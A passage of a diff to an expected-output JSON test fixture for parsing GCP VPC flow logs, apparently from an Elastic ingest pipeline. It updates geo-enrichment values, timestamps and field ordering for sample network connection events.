"default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 86 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -4646,13 +4891,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65316, @@ -4660,6 +4908,16 @@ "ip": "67.43.156.13", "packets": 709 }, + "event": { + "ingested": "2021-12-14T14:43:27.415196173Z", + "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565831992Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "1ulp77rfdvho5g", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4671,7 +4929,9 @@ "iana_number": "6", "packets": 709, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -4682,6 +4942,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -4698,25 +4961,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 86 + "ms": 87 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391407100Z", - "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565831992Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "1ulp77rfdvho5g", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -4725,13 +4973,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65263, @@ -4739,6 +4990,16 @@ "ip": "67.43.156.13", "packets": 728 }, + "event": { + "ingested": "2021-12-14T14:43:27.415196573Z", + "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:01.270990648Z", + "end": "2019-06-14T03:49:56.220748025Z", + "id": "1ulp77rfdvho59", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4750,17 +5011,22 @@ "iana_number": "6", "packets": 728, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -4777,25 +5043,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 87 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391412500Z", - "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:01.270990648Z", - "end": "2019-06-14T03:49:56.220748025Z", - "id": "1ulp77rfdvho59", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -4816,6 +5067,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415196963Z", + "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:20.454046087Z", + "end": "2019-06-14T03:40:20.569744903Z", + "id": "1ulp77rfdvho57", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4827,19 +5088,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -4850,29 +5122,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391417900Z", - "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:20.454046087Z", - "end": "2019-06-14T03:40:20.569744903Z", - "id": "1ulp77rfdvho57", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -4893,6 +5144,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415197356Z", + "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:20.454046087Z", + "end": "2019-06-14T03:40:20.569744903Z", + "id": "1ulp77rfdvho5e", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4904,22 +5165,27 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "10.139.99.242", + "192.168.2.165" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 233 } }, "source": { @@ -4935,21 +5201,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391423500Z", - "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:20.454046087Z", - "end": "2019-06-14T03:40:20.569744903Z", - "id": "1ulp77rfdvho5e", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", @@ -4972,6 +5223,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415197755Z", + "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:46.541094678Z", + "end": "2019-06-14T03:40:52.361155668Z", + "id": "1ulp77rfdvho4d", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4983,46 +5244,6 @@ "iana_number": "6", "packets": 11, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "192.168.2.165" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 233 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391427700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:46.541094678Z", - "end": "2019-06-14T03:40:52.361155668Z", - "id": "1ulp77rfdvho4d", - "category": "network", - "type": "connection" } }, { @@ -5037,11 +5258,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33558, @@ -5113,7 +5339,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391432100Z", + "ingested": "2021-12-14T14:43:27.415198165Z", "original": "{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", @@ -5129,11 +5355,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -5211,7 +5442,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391437100Z", + "ingested": "2021-12-14T14:43:27.415198558Z", "original": "{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", @@ -5222,9 +5453,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 89 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -5233,13 +5494,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65271, @@ -5247,6 +5511,16 @@ "ip": "67.43.156.13", "packets": 717 }, + "event": { + "ingested": "2021-12-14T14:43:27.415198948Z", + "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378070Z", + "end": "2019-06-14T03:49:55.318940798Z", + "id": "1ulp77rfdvho4v", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -5258,17 +5532,22 @@ "iana_number": "6", "packets": 717, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", + } + }, + { + "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ "67.43.156.13", - "10.139.99.242" + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -5285,25 +5564,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 89 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391441700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378070Z", - "end": "2019-06-14T03:49:55.318940798Z", - "id": "1ulp77rfdvho4v", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -5312,11 +5576,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34178, @@ -5324,6 +5593,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415199372Z", + "original": 